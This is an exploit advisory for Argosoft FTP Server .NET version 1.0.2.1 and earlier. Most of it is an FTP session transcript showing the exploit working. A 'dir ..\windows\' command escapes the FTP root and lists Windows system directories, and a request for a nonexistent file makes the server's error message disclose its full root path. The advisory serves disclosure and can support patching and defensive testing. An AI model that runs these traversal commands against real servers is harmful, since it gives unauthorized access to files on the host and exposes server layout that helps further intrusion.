# Exploit Title: Argosoft FTP SERVER .NET Version <= 1.0.2.1 Path Traversal & Full Path Disclosure. # Date: 23/04/10 # Author: cp77fk4r | empty0page[SHIFT+2]gmail.com | www.DigitalWhisper.co.il # Software Link: http://www.argosoft.com/rootpages/FtpServerNet/Default.aspx| http://www.argosoft.com/rootpages/Download.aspx # Version: Version <= 1.0.2.1 # Tested on: .NET # # ##[Path traversal:] The attacker can break his "root-jail" and gain access to the other local files on the server, E.g: # ftp> pwd 257 "/" is working directory //[i'm standing on the ftp root directory] ftp> dir 200 Port command successful 150 Opening ASCII data connection drw-r--r-- 1 user group 0 Apr 26 18:29 tesstdir -rw-r--r-- 1 user group 0 Apr 26 18:29 testfile.txt 226 Transfer complete ftp: 134 bytes received in 0.01Seconds 22.33Kbytes/sec. ftp> cd .. 250 Requested file action OK, completed ftp> pwd 257 "/" is working directory //[i'm still there...] ftp> dir ..\windows\ 200 Port command successful 150 Opening ASCII data connection drw-r--r-- 1 user group 0 Nov 02 2006 addins drw-r--r-- 1 user group 0 Feb 25 11:24 AppPatch -rw-r--r-- 1 user group 1069 Apr 07 11:54 ARPR.INI drw-r--r-- 1 user group 0 Mar 20 19:29 assembly . . . . drw-r--r-- 1 user group 0 Nov 02 2006 system -rw-r--r-- 1 user group 219 Sep 18 2006 system.ini drw-r--r-- 1 user group 0 Apr 26 15:59 System32 . . . . 226 Transfer complete ftp: 9584 bytes received in 0.07Seconds 129.51Kbytes/sec. ftp> :) //[P0wnd! :)] # # ##[Full Path Disclosure:] The attacker can get the full-path to his root directory by trying to GET file that don't exist, E.g: # ftp> get Remote file: none_exist_file Local file: none_exist_file 200 Port command successful 550 Requested file not found c:\server\none_exist_file //[In the Error we can see the full-path to the ftp root directory] # # [e0f]